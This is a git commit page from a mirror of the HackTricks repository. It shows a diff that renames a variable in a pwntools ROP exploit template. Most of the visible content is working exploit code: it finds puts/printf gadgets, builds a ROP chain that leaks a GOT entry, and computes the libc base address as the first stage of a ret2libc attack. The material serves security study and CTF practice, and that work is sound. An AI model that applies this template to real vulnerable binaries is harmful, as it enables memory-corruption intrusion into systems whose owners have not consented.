0x22bb/hacktricks
1
2
Fork 0
mirror of https://github.com/carlospolop/hacktricks.git synced 2023-12-14 19:12:55 +01:00
Code Releases Activity

GitBook: [master] one page modified

Browse source
This commit is contained in:
CPol 2021-03-22 11:18:24 +00:00 committed by gitbook-bot
parent 307eb099ba
commit bceb2bdadc
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
1 changed files with 8 additions and 8 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

16
exploiting/linux-exploiting-basic-esp/rop-pwn-template.md
View file

@ -62,10 +62,10 @@ if OFFSET == b"":
#### Find Gadgets ### #### Find Gadgets ###
##################### #####################
try: try:
print_func = "puts" libc_func = "puts"
PUTS_PLT = ELF_LOADED.plt['puts'] #PUTS_PLT = ELF_LOADED.symbols["puts"] # This is also valid to call puts PUTS_PLT = ELF_LOADED.plt['puts'] #PUTS_PLT = ELF_LOADED.symbols["puts"] # This is also valid to call puts
except: except:
print_func = "printf" libc_func = "printf"
PUTS_PLT = ELF_LOADED.plt['printf'] PUTS_PLT = ELF_LOADED.plt['printf']
MAIN_PLT = ELF_LOADED.symbols['main'] MAIN_PLT = ELF_LOADED.symbols['main']
@ -97,9 +97,9 @@ def generate_payload_aligned(rop):
return payload1 return payload1
def get_addr(print_func): def get_addr(libc_func):
FUNC_GOT = ELF_LOADED.got[print_func] FUNC_GOT = ELF_LOADED.got[libc_func]
log.info(print_func + " GOT @ " + hex(FUNC_GOT)) log.info(libc_func + " GOT @ " + hex(FUNC_GOT))
# Create rop chain # Create rop chain
rop1 = p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT) rop1 = p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT)
rop1 = generate_payload_aligned(rop1) rop1 = generate_payload_aligned(rop1)
@ -117,11 +117,11 @@ def get_addr(print_func):
# Parse leaked address # Parse leaked address
log.info(f"Len rop1: {len(rop1)}") log.info(f"Len rop1: {len(rop1)}")
leak = u64(recieved.ljust(8, b"\x00")) leak = u64(recieved.ljust(8, b"\x00"))
log.info(f"Leaked LIBC address, {print_func}: {hex(leak)}") log.info(f"Leaked LIBC address, {libc_func}: {hex(leak)}")
# Set lib base address # Set lib base address
if LIBC: if LIBC:
LIBC.address = leak - LIBC.symbols[print_func] #Save LIBC base LIBC.address = leak - LIBC.symbols[libc_func] #Save LIBC base
log.info("LIBC base @ %s" % hex(LIBC.address)) log.info("LIBC base @ %s" % hex(LIBC.address))
# If not LIBC yet, stop here # If not LIBC yet, stop here
@ -131,7 +131,7 @@ def get_addr(print_func):
return hex(leak) return hex(leak)
get_addr(print_func) #Search for puts address in memmory to obtains LIBC base get_addr(libc_func) #Search for puts address in memmory to obtain LIBC base